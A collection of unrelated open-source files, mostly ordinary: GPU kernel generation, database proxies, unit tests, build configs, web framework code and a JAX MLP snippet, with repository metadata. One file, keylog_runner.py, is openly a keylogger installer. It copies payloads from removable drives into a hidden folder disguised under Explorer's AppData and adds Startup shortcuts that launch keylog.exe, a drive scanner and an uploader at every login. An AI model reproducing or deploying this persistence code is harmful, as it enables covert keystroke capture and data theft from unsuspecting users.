kStr += " }%s" % self.endLine
########################################
# end
kStr += "}%s" % self.endLine
for i in range(firstStride, lastStrideC):
kStr += "#undef strideD" + self.indexChars[i] + self.endLine
for i in range(firstStride, lastStrideC):
kStr += "#undef strideC" + self.indexChars[i] + self.endLine
kStr += "#undef GLOBAL_D%s" % (self.endLine)
kStr += "#undef GLOBAL_C%s" % (self.endLine)
kStr += "#undef SCALAR_ZERO%s" % ( self.endLine)
return kStr
def getKernelName(self):
indexChars = globalParameters["IndexChars"]
# C dimensions
name = "C"
for i in range(0, self.state["ProblemType"]["NumIndicesC"]):
name += indexChars[i].lower()
name += "_"
name += self.state["ProblemType"]["DestDataType"].toChar()
name += "" if self.state["ProblemType"]["StridedBatched"] else "_GB" # legacy
name += "_GA" if self.state["_GlobalAccumulation"] else ""
return name
def getSourceFileString(self):
fileString = ""
if not globalParameters["MergeFiles"]:
fileString += "\n"
fileString += "#include \"%s.h\"\n" % self.kernelName
fileString += "\n"
fileString += self.functionSignature()
fileString += self.kernelBodyBetaOnly()
return (0, fileString)
def getHeaderFileString(self):
fileString = "" # CHeader
if not globalParameters["MergeFiles"]:
fileString += CHeader
fileString += "#pragma once\n\n"
fileString += "\n"
fileString += "#include <KernelHeader.h>\n\n"
fileString += "#include <hip/hip_runtime.h>\n"
fileString += "#include <hip/hip_fp16.h>\n"
fileString += "\n"
fileString += self.functionSignature()
fileString += ";\n"
return fileString
| {
"content_hash": "06953b1d54227807a3fb216abc729b87",
"timestamp": "",
"source": "github",
"line_count": 299,
"max_line_length": 120,
"avg_line_length": 38.876254180602004,
"alnum_prop": 0.5975567790777702,
"repo_name": "ROCmSoftwarePlatform/Tensile",
"id": "50b38dd2ef7be149427d00063d9db4acaea71fd4",
"size": "11624",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "Tensile/KernelWriterBetaOnly.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "1179916"
},
{
"name": "Awk",
"bytes": "1667"
},
{
"name": "C++",
"bytes": "1570879"
},
{
"name": "CMake",
"bytes": "70754"
},
{
"name": "Dockerfile",
"bytes": "1413"
},
{
"name": "Groovy",
"bytes": "23999"
},
{
"name": "Makefile",
"bytes": "5336"
},
{
"name": "Python",
"bytes": "2699223"
},
{
"name": "Shell",
"bytes": "64197"
},
{
"name": "TeX",
"bytes": "83918"
}
],
"symlink_target": ""
} |
from taskbuffer.OraDBProxy import DBProxy
import sys
import json
class NewDBProxy(DBProxy):
'''
Class extending OraDBProxy to add some column name mapping utilites
'''
def queryColumnSQL(self, sql, varMap = None, arraySize = 100, lowerCase = True):
comment = ' /* cacheSchedConfig column query */'
if self.conn == None:
return None, None
try:
self.conn.begin()
self.cur.arraysize = arraySize
sys.stderr.write("querySQL : %s, %s, %s \n" % (sql, varMap, comment))
if varMap == None:
ret = self.cur.execute(sql+comment)
else:
ret = self.cur.execute(sql+comment,varMap)
res = self.cur.fetchall()
self.conn.commit()
retList = []
for panda_queue, data, in res:
if isinstance(data, str):
dictData = json.loads(data)
elif isinstance(data, dict):
dictData = data
else:
dictData = json.loads(data.read())
dictData['siteid'] = panda_queue
retList.append(dictData)
return retList
except:
raise
def querySQL(self, sql, varMap = None, arraySize=100):
comment = ' /* cacheSchedConfig standard query */'
if self.conn == None:
return None
try:
self.conn.begin()
self.cur.arraysize = arraySize
sys.stderr.write("querySQL : %s, %s, %s \n" % (sql, varMap, comment))
if varMap == None:
ret = self.cur.execute(sql+comment)
else:
ret = self.cur.execute(sql+comment,varMap)
res = self.cur.fetchall()
self.conn.commit()
return res
except:
# roll back
raise
def mapRowsToDictionary(self, columnNames, rows):
resDictArray = []
for row in rows:
tmpDict = {}
for i in range(len(columnNames)):
tmpDict[columnNames[i]] = row[i]
resDictArray.append(tmpDict)
return resDictArray
| {
"content_hash": "471e901f61291249b0f06ab9c3c944f9",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 84,
"avg_line_length": 34.28125,
"alnum_prop": 0.5154968094804011,
"repo_name": "PanDAWMS/panda-cacheschedconfig",
"id": "b2c3a3f4050978bbbdc659dbd8159378ec7306b8",
"size": "2194",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cacheschedconfig/OraDBProxy2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13024"
},
{
"name": "Shell",
"bytes": "2357"
}
],
"symlink_target": ""
} |
import re
import mock
import testtools
from stackalytics.processor import mls
EMAIL_CONTENT = '''
From sorlando at nicira.com Tue Jul 17 07:30:43 2012
From: sorlando at nicira.com (Salvatore Orlando)
Date: Tue, 17 Jul 2012 00:30:43 -0700
Subject: [openstack-dev] [nova] [pci device passthrough] fails with
"NameError: global name '_' is not defined"
In-Reply-To: <[email protected]>
References: <[email protected]>
Message-ID: <[email protected]>
Good morning Gary!
-----------------
test works :)
> Reply
'''
class TestMls(testtools.TestCase):
def test_mail_parse_regex(self):
content = '''
URL: <http://lists.openstack.org/pipermail/openstack-dev/>
From sorlando at nicira.com Tue Jul 17 07:30:43 2012
From: sorlando at nicira.com (Salvatore Orlando)
Date: Tue, 17 Jul 2012 00:30:43 -0700
Subject: [openstack-dev] [nova] [pci device passthrough] fails with
"NameError: global name '_' is not defined"
In-Reply-To: <[email protected]>
References: <[email protected]>
Message-ID: <[email protected]>
Good morning Gary!
test works :)
From sorlando at nicira.com Tue Jul 17 07:30:43 2012
From: sorlando at nicira.com (Salvatore Orlando)
'''
match = re.search(mls.MAIL_BOX_PATTERN, content)
self.assertTrue(match)
self.assertEqual('sorlando at nicira.com', match.group(1))
self.assertEqual('Salvatore Orlando', match.group(2))
self.assertEqual('Tue, 17 Jul 2012 00:30:43 -0700', match.group(3))
self.assertEqual('[openstack-dev] [nova] [pci device passthrough] '
'fails with\n "NameError: global name \'_\' is not '
'defined"', match.group(4))
self.assertEqual('<CAGR=i3htLvDOdh5u6mxqmo0zVP1eKKYAxAhj='
'[email protected]>', match.group(5))
self.assertEqual('Good morning Gary!\n\ntest works :)\n',
match.group(6))
@mock.patch('stackalytics.processor.utils.read_gzip_from_uri')
@mock.patch('stackalytics.processor.mls._get_mail_archive_links')
@mock.patch('stackalytics.processor.mls._uri_content_changed')
def test_log(self, mock_uri_content_changed, mock_get_mail_archive_links,
mock_read_gzip_from_uri):
mock_uri_content_changed.return_value = True
mock_get_mail_archive_links.return_value = ['link']
mock_read_gzip_from_uri.return_value = EMAIL_CONTENT
mock_rsi = mock.Mock()
emails = list(mls.log('uri', mock_rsi))
self.assertEqual(1, len(emails))
self.assertEqual('Good morning Gary!\n\ntest works :)\n',
emails[0]['body'])
| {
"content_hash": "a1cd2036d15ae5eb4429a072444ca5e7",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 77,
"avg_line_length": 35.717948717948715,
"alnum_prop": 0.6651112706389088,
"repo_name": "0xf2/stackalytics",
"id": "3e6a2d49dd727b2656a48c39aa30b6cdbec2a452",
"size": "3368",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "stackalytics/tests/unit/test_mls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "40486"
},
{
"name": "HTML",
"bytes": "105450"
},
{
"name": "JavaScript",
"bytes": "80552"
},
{
"name": "Python",
"bytes": "441953"
},
{
"name": "Shell",
"bytes": "177"
}
],
"symlink_target": ""
} |
import os
import shutil
import wmi
import win32api
import win32con
from win32com.client import Dispatch
#Copy files from removable drive to C:\Users\USER\AppData\Local\Microsoft\Windows\Explorer\temp
#Create shortcuts pointing to keylog executable
def copy():
user = os.environ.get("USERNAME")
c = wmi.WMI()
remov_disks = c.Win32_LogicalDisk(DriveType=2)
for disk in remov_disks:
try:
#copy files
shutil.copytree(
r'%s\temp' % disk.Name,
r'C:\Users\%s\AppData\Local\Microsoft\Windows\Explorer' % user
)
shutil.copy(
r'%s\autorun.inf' % disk.Name,
r'C:\Users\%s\AppData\Local\Microsoft\Windows\Explorer' % user
)
#hide directory
win32api.SetFileAttributes(
r'C:\Users\%s\AppData\Local\Microsoft\Windows\Explorer\temp' % user,
win32con.FILE_ATTRIBUTE_HIDDEN
)
#hide autorun.inf
win32api.SetFileAttributes(
r'C:\Users\%s\AppData\Local\Microsoft\Windows\Explorer' % user,
win32con.FILE_ATTRIBUTE_HIDDEN
)
except: #Other storage device
pass
def create_shortcut(path, target="", wDir="", icon=""):
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(path)
shortcut.Targetpath = target
shortcut.save()
if __name__ == "__main__":
copy()
#Create keylogger shortcut in startup programs
create_shortcut(
u'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\k_short.lnk',
u'C:\\Users\\%s\\appData\\Local\\Microsoft\\Windows\\Explorer\\temp\\keylog.exe' % user
)
#Create drive_scanner shortcut in startup programs
create_shortcut(
u'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ds_short.lnk',
u'C:\\Users\\%s\\AppData\\Local\\Microsoft\\Windows\\Explorer\\temp\\drive_scanner.exe' % user
)
#Create upload shortcut in startup programs
create_shortcut(
u'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\up_short.lnk',
u'C:\\Users\\%s\\AppData\\Local\\Microsoft\\Windows\\Explorer\\temp\\upload.exe' % user
)
# | {
"content_hash": "6039ed363b6c41bcd0b3c73c48062e2b",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 96,
"avg_line_length": 32.377049180327866,
"alnum_prop": 0.7129113924050633,
"repo_name": "Brunope/Keylogger",
"id": "b1cf980f4a9c443f6f2792fd04db96ea50a841ab",
"size": "1975",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "keylog_runner.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "6296"
}
],
"symlink_target": ""
} |
"""
Test compiling and executing using the gdc tool.
"""
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/D/CoreScanner/sconstest-gdc.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
from Common.common import testForTool
testForTool('gdc')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| {
"content_hash": "71533db17e8607ab10549270a960d3c9",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 109,
"avg_line_length": 39.13513513513514,
"alnum_prop": 0.7651933701657458,
"repo_name": "EmanueleCannizzaro/scons",
"id": "6e1773be73f70ad98c40b4065df6014773e4142d",
"size": "1448",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/D/CoreScanner/sconstest-gdc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2491"
},
{
"name": "C",
"bytes": "659"
},
{
"name": "C++",
"bytes": "598"
},
{
"name": "CSS",
"bytes": "18502"
},
{
"name": "D",
"bytes": "1997"
},
{
"name": "HTML",
"bytes": "817651"
},
{
"name": "Java",
"bytes": "6860"
},
{
"name": "JavaScript",
"bytes": "215495"
},
{
"name": "Makefile",
"bytes": "3795"
},
{
"name": "Perl",
"bytes": "29978"
},
{
"name": "Python",
"bytes": "7510453"
},
{
"name": "Roff",
"bytes": "556545"
},
{
"name": "Ruby",
"bytes": "11074"
},
{
"name": "Shell",
"bytes": "52682"
},
{
"name": "XSLT",
"bytes": "7567242"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import specs.fbthrift as fbthrift
import specs.folly as folly
import specs.gmock as gmock
from shell_quoting import ShellQuoted, path_join
"fbcode_builder steps to build & test watchman"
def fbcode_builder_spec(builder):
builder.add_option("watchman/_build:cmake_defines", {"BUILD_SHARED_LIBS": "OFF"})
projects = builder.option("projects_dir")
return {
"depends_on": [gmock, folly, fbthrift],
"steps": [
builder.fb_github_cmake_install("watchman/_build", ".."),
builder.step(
"Run watchman tests",
[
builder.run(
ShellQuoted("ctest --output-on-failure -j {n}").format(
n=builder.option("make_parallelism")
)
),
builder.run(
ShellQuoted(
"cd ../ && ./runtests.py --concurrency {n} "
"--watchman-path _build/watchman --pybuild-dir {p}"
).format(
n=builder.option("make_parallelism"),
p=path_join(
projects, "../shipit_projects/watchman/_build/python"
),
)
),
],
),
],
}
config = {
"github_project": "facebook/watchman",
"fbcode_builder_spec": fbcode_builder_spec,
}
| {
"content_hash": "ee15343b15d291cfe481f21800077f20",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 85,
"avg_line_length": 31.372549019607842,
"alnum_prop": 0.476875,
"repo_name": "wez/watchman",
"id": "e9fb6a2ac3bca6a716318083502f021ea5acf556",
"size": "1622",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "build/fbcode_builder_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "68354"
},
{
"name": "C++",
"bytes": "1017051"
},
{
"name": "CMake",
"bytes": "33772"
},
{
"name": "CSS",
"bytes": "42513"
},
{
"name": "HTML",
"bytes": "36593"
},
{
"name": "Java",
"bytes": "165025"
},
{
"name": "JavaScript",
"bytes": "35291"
},
{
"name": "Python",
"bytes": "677902"
},
{
"name": "Ruby",
"bytes": "21741"
},
{
"name": "Rust",
"bytes": "69015"
},
{
"name": "Shell",
"bytes": "13265"
},
{
"name": "Thrift",
"bytes": "32316"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import sys
import warnings
from google.cloud.talent_v4beta1 import types
from google.cloud.talent_v4beta1.gapic import application_service_client
from google.cloud.talent_v4beta1.gapic import company_service_client
from google.cloud.talent_v4beta1.gapic import completion_client
from google.cloud.talent_v4beta1.gapic import enums
from google.cloud.talent_v4beta1.gapic import event_service_client
from google.cloud.talent_v4beta1.gapic import job_service_client
from google.cloud.talent_v4beta1.gapic import profile_service_client
from google.cloud.talent_v4beta1.gapic import tenant_service_client
if sys.version_info[:2] == (2, 7):
message = (
"A future version of this library will drop support for Python 2.7."
"More details about Python 2 support for Google Cloud Client Libraries"
"can be found at https://cloud.google.com/python/docs/python2-sunset/"
)
warnings.warn(message, DeprecationWarning)
class ApplicationServiceClient(application_service_client.ApplicationServiceClient):
__doc__ = application_service_client.ApplicationServiceClient.__doc__
enums = enums
class CompanyServiceClient(company_service_client.CompanyServiceClient):
__doc__ = company_service_client.CompanyServiceClient.__doc__
enums = enums
class CompletionClient(completion_client.CompletionClient):
__doc__ = completion_client.CompletionClient.__doc__
enums = enums
class EventServiceClient(event_service_client.EventServiceClient):
__doc__ = event_service_client.EventServiceClient.__doc__
enums = enums
class JobServiceClient(job_service_client.JobServiceClient):
__doc__ = job_service_client.JobServiceClient.__doc__
enums = enums
class ProfileServiceClient(profile_service_client.ProfileServiceClient):
__doc__ = profile_service_client.ProfileServiceClient.__doc__
enums = enums
class TenantServiceClient(tenant_service_client.TenantServiceClient):
__doc__ = tenant_service_client.TenantServiceClient.__doc__
enums = enums
__all__ = (
"enums",
"types",
"ApplicationServiceClient",
"CompanyServiceClient",
"CompletionClient",
"EventServiceClient",
"JobServiceClient",
"ProfileServiceClient",
"TenantServiceClient",
)
| {
"content_hash": "45fd1495bd082c6983cdf5f56b93e4ce",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 84,
"avg_line_length": 32.7,
"alnum_prop": 0.7553516819571865,
"repo_name": "tswast/google-cloud-python",
"id": "0d10d0bed3783cbe87d5e3ab1eb85178a994abf0",
"size": "2892",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "talent/google/cloud/talent_v4beta1/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1094"
},
{
"name": "Python",
"bytes": "33785371"
},
{
"name": "Shell",
"bytes": "9148"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe.model.naming import append_number_if_name_exists
from frappe.website.utils import cleanup_page_name
from frappe.utils import now
from frappe.modules import get_module_name, load_doctype_module
from frappe.website.doctype.website_route.website_route import remove_sitemap
class WebsiteGenerator(Document):
def autoname(self):
self.name = self.get_page_name()
append_number_if_name_exists(self)
def onload(self):
self.get("__onload").website_route = self.get_route()
def get_parent_website_route(self):
return self.get("parent_website_route", "")
def validate(self):
if self.is_condition_field_enabled() and self.meta.get_field("page_name") and not self.page_name:
self.page_name = self.get_page_name()
def on_update(self):
self.update_sitemap()
if getattr(self, "save_versions", False):
frappe.add_version(self)
def get_route(self):
parent = self.get_parent_website_route()
return ((parent + "/") if parent else "") + self.get_page_name()
def get_route_docname(self, name=None):
return frappe.db.get_value("Website Route",
{"ref_doctype":self.doctype, "docname": name or self.name})
def after_rename(self, olddn, newdn, merge):
if self.is_condition_field_enabled():
self.update_route(self.get_route_docname())
def on_trash(self):
remove_sitemap(ref_doctype=self.doctype, docname=self.name)
def is_condition_field_enabled(self):
self.controller_module = load_doctype_module(self.doctype)
if hasattr(self.controller_module, "condition_field"):
return self.get(self.controller_module.condition_field) and True or False
else:
return True
def update_sitemap(self):
# update route of all descendants
route_docname = self.get_route_docname()
if not self.is_condition_field_enabled():
frappe.delete_doc("Website Route", route_docname, ignore_permissions=True)
return
if route_docname:
self.update_route(route_docname)
else:
self.insert_route()
def update_route(self, route_docname):
route = frappe.get_doc("Website Route", route_docname)
if self.get_route() != route_docname:
route.rename(self.get_page_name(), self.get_parent_website_route())
route.idx = self.idx
route.page_title = self.get_page_title()
self.update_permissions(route)
route.save(ignore_permissions=True)
def insert_route(self):
if self.modified:
# for sitemap.xml
lastmod = frappe.utils.get_datetime(self.modified).strftime("%Y-%m-%d")
else:
lastmod = now()
route = frappe.new_doc("Website Route")
route.update({
"page_or_generator": "Generator",
"ref_doctype":self.doctype,
"idx": self.idx,
"docname": self.name,
"page_name": self.get_page_name(),
"controller": get_module_name(self.doctype, self.meta.module),
"template": self.controller_module.template,
"lastmod": lastmod,
"parent_website_route": self.get_parent_website_route(),
"page_title": self.get_page_title()
})
self.update_permissions(route)
route.ignore_links = True
route.insert(ignore_permissions=True)
def update_permissions(self, route):
if self.meta.get_field("public_read"):
route.public_read = self.public_read
route.public_write = self.public_write
else:
route.public_read = 1
def get_page_name(self):
return self.get_or_make_page_name()
def get_page_name_field(self):
return self.page_name_field if hasattr(self, "page_name_field") else "page_name"
def get_or_make_page_name(self):
page_name = self.get(self.get_page_name_field())
if not page_name:
page_name = cleanup_page_name(self.get_page_title())
if self.is_new():
self.set(self.get_page_name_field(), page_name)
return page_name
def get_page_title(self):
return self.get("title") or (self.name.replace("-", " ").replace("_", " ").title())
| {
"content_hash": "edff35b72af7130e305f0443178f4f86",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 99,
"avg_line_length": 31.080645161290324,
"alnum_prop": 0.7114686040477426,
"repo_name": "gangadharkadam/office_frappe",
"id": "e73d6aae1a0615a241ab80f6bc405b26c2c0262b",
"size": "3958",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "frappe/website/website_generator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "80527"
},
{
"name": "HTML",
"bytes": "60452"
},
{
"name": "JavaScript",
"bytes": "1182079"
},
{
"name": "Python",
"bytes": "906331"
}
],
"symlink_target": ""
} |
import os
from paste import urlmap
from paste import fileapp
from webob.exc import HTTPNotFound
from minreal.client import MinrealClient
from minreal.csp import CSPApp
class EchoClient(MinrealClient):
""" A plugin that echos back any data sent it.
This plugin also provides a simple HTML UI that allows user interaction
as a demonstration.
"""
@classmethod
def app(cls):
""" The 'app' method returns a WSGI app that wraps the plugin."""
# Here, we build a PythonPaste URLMap WSGI application that will
# that will dispatch to our various components.
map = urlmap.URLMap(HTTPNotFound())
# This plugin provides an index page,
index_path = os.path.join(os.path.dirname(__file__),
'static',
'echo.html')
map['/'] = fileapp.FileApp(index_path)
# as well as an app to serve its static assets.
static_path = os.path.join(os.path.dirname(__file__), 'static')
map['/static'] = fileapp.DirectoryApp(static_path)
# The CSPApp must be mounted somewhere in the WSGI tree as this is the
# WSGI app that handles communication with the browser.
map['/csp'] = CSPApp(cls)
return map
def __init__(self, send_func):
# The plugin constructor takes one argument: a callable that sends its
# (unicode) argument to the browser client.
self._send = send_func
def handle_data(self, chunk):
""" Process a chunk of data transmitted from the browser to the plugin.
This 'chunk' will be be a unicode string containing the transmitted
data.
"""
# The EchoClient plugin sends the chunk right back to the browser.
self._send(chunk)
| {
"content_hash": "ffec90f7e26542a9e3f24bf89ae33a09",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 79,
"avg_line_length": 33,
"alnum_prop": 0.6247933884297521,
"repo_name": "desmaj/minreal",
"id": "0d68b023148242f92294be81e2f1e41787b05dc7",
"size": "1815",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "minreal/examples/echo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "3623"
},
{
"name": "JavaScript",
"bytes": "36305"
},
{
"name": "Python",
"bytes": "30030"
}
],
"symlink_target": ""
} |
"""
models imports app, but app does not import models so we haven't created
any loops.
"""
import datetime
from flask_peewee.auth import BaseUser # provides password helpers..
from peewee import *
from .app import db
class User(db.Model, BaseUser):
username = CharField()
password = CharField()
email = CharField()
join_date = DateTimeField(default=datetime.datetime.now)
active = BooleanField(default=True)
admin = BooleanField(default=False)
def __unicode__(self):
return self.username
| {
"content_hash": "ecb88c31a5442ea540c206b3433b4413",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 72,
"avg_line_length": 23.130434782608695,
"alnum_prop": 0.706766917293233,
"repo_name": "sloria/flask-template",
"id": "2b8e8e403b59137ee96ed701120c5ce1d73c2db4",
"size": "557",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "project/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CoffeeScript",
"bytes": "0"
},
{
"name": "JavaScript",
"bytes": "62860"
},
{
"name": "Python",
"bytes": "3794"
}
],
"symlink_target": ""
} |
"""
OVERALL CREDIT TO:
t0mm0, Eldorado, VOINAGE, BSTRDMKR, tknorris, smokdpi, TheHighway
urlresolver XBMC Addon
Copyright (C) 2011 t0mm0
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
from lib import helpers
from urlresolver import common
from urlresolver.resolver import UrlResolver, ResolverError
class NxloadResolver(UrlResolver):
name = "nxload"
domains = ["nxload.com"]
pattern = '(?://|\.)(nxload\.com)/(?:embed-)?([0-9a-zA-Z]+)'
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
headers = {'User-Agent': common.RAND_UA}
html = self.net.http_GET(web_url, headers=headers).content
if html:
match = re.search('''['"]?sources['"]?\s*:\s*\[(.*?)\]''', html, re.DOTALL)
if match:
sources = [(source.rsplit('/', 1).pop(1), source) for source in
re.findall('''['"](.*?)["']''', match.group(1), re.DOTALL)]
return helpers.pick_source(sources) + helpers.append_headers(headers)
raise ResolverError("Video not found")
def get_url(self, host, media_id):
return self._default_get_url(host, media_id)
| {
"content_hash": "f893b85d9f3912dcc56b2f2c95a8896d",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 87,
"avg_line_length": 37.58,
"alnum_prop": 0.6397019691325173,
"repo_name": "dbiesecke/dbiesecke.github.io",
"id": "7cb4a808074ed3047178dfd65e1d8ad93bb64cc5",
"size": "1879",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "repo/script.module.urlresolver/lib/urlresolver/plugins/nxload.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "23106"
},
{
"name": "HTML",
"bytes": "1689379"
},
{
"name": "JavaScript",
"bytes": "103456"
},
{
"name": "Makefile",
"bytes": "4554"
},
{
"name": "Perl",
"bytes": "2785"
},
{
"name": "Python",
"bytes": "14200477"
},
{
"name": "Shell",
"bytes": "1804"
}
],
"symlink_target": ""
} |
import flax.linen.activation
import numpy as np
import jax
import jax.numpy as jnp
from jax import jit, grad, vmap, random, device_put, device_get
from jax.tree_util import tree_map, tree_leaves, tree_multimap, tree_structure
from flax.linen.activation import relu, sigmoid
from functools import reduce, partial
def init_mlp_params(layers):
layer_maps = list(zip(layers[:-1], layers[1:]))
params = [
{
'weights': np.random.normal(size=(m, n))*np.sqrt(n),
'biases': np.random.normal(size=(m, 1)),
}
for n, m in layer_maps
]
return params
def predict(params, x, activations=None):
if activations is None:
activations = ([relu] * (len(params) - 1)) + [sigmoid]
for i in range(len(params)):
x = activations[i](jnp.dot(params[i]['weights'], x) + params[i]['biases'])
return x[0][0]
| {
"content_hash": "042b806b410b9e5660700c4e81307775",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 82,
"avg_line_length": 29.166666666666668,
"alnum_prop": 0.6354285714285715,
"repo_name": "mattmcd/PyBayes",
"id": "3d778b09112dd6cad3d0a450cbae9ebada584a91",
"size": "875",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/jax_tutorial_20220726.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "240"
},
{
"name": "HTML",
"bytes": "341002"
},
{
"name": "Jupyter Notebook",
"bytes": "11407256"
},
{
"name": "Python",
"bytes": "62547"
},
{
"name": "Stan",
"bytes": "2368"
}
],
"symlink_target": ""
} |
from confiture import Confiture, ConfigFileError
from src.shell.data.data import Data
class ScatTest(object):
def __init__(self, *args, **kwargs):
self.__config = kwargs["clang"]
self.__accuracy = {"arity": list(), "type": list()}
def display(self):
print "Average on ({}):".format(", ".join(self.__pgm.keys()))
ok = sum(map(lambda a: a[0], self.__accuracy["arity"]))
tot = sum(map(lambda a: a[1], self.__accuracy["arity"]))
print "| Arity: {0}/{1} - {2:.2f}%".format(
ok,
tot,
ok*100.0/tot
)
ok = sum(map(lambda a: a[0], self.__accuracy["type"]))
tot = sum(map(lambda a: a[1], self.__accuracy["type"]))
print "| Type: {0}/{1} - {2:.2f}%".format(
ok,
tot,
ok*100.0/tot
)
def out(self, m):
print m
def test_all(self, p_arity, p_type, config):
conf = Confiture("config/templates/test.yaml")
self.__pgm = conf.check_and_get("test/config/" + config)
for pgm, data in self.__pgm.items():
# Step One: execute program with arguments
cmd = "{}/{}".format(data["bin"], pgm)
self.out("Launching {0} inference on {1}".format(p_arity, cmd))
p_arity.launch(cmd, data["args"].split(" ") + [" > /dev/null"], verbose=False)
self.out("Launching {0} inference on {1}".format(p_type, cmd))
p_type.launch(cmd, data["args"].split(" ") + [" > /dev/null"], verbose=False)
# Step Two: parse source
# Create a parser object
src_data = Data(self.__config["data-path"], pgm)
if src_data.parse(cmd, self.__config["lib-path"], data["src"], force=False, verbose=False):
src_data.dump()
else:
src_data.load(verbose=False)
# Finally, compare source with infered results
self.__accuracy["arity"].append(p_arity.get_analysis(pgm, src_data).accuracy(get=True, verbose=False))
self.__accuracy["type"].append(p_type.get_analysis(pgm, src_data).accuracy(get=True, verbose=False))
self.display()
| {
"content_hash": "e5bc5dedec078d629e56f90e07dc28ea",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 114,
"avg_line_length": 44.450980392156865,
"alnum_prop": 0.5147772386413763,
"repo_name": "Frky/scat",
"id": "23388f6e36ef0e02507480903cc139689fcfd758",
"size": "2268",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/shell/test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "171879"
},
{
"name": "C++",
"bytes": "146974"
},
{
"name": "CSS",
"bytes": "1387"
},
{
"name": "HTML",
"bytes": "889"
},
{
"name": "Makefile",
"bytes": "864"
},
{
"name": "Python",
"bytes": "211318"
},
{
"name": "Shell",
"bytes": "12754"
}
],
"symlink_target": ""
} |
from flask import Flask, render_template
from videoonline import models
from videoonline.models import db
from videoonline.extensions import bcrypt, login_manager, principals
from flask_principal import identity_loaded, UserNeed, RoleNeed
from flask_login import current_user
def Create_App(Config = 'videoonline.config.DevConfig'):
app = Flask(__name__)
with app.app_context():
app.config.from_object(Config)
# Will be load the SQLALCHEMY_DATABASE_URL from config.py to db object
db.init_app(app)
# 数据库是一个重要的组件,所以先把数据库内容全部完成再继续后面的操作
# Init the Flask-Bcrypt via app object
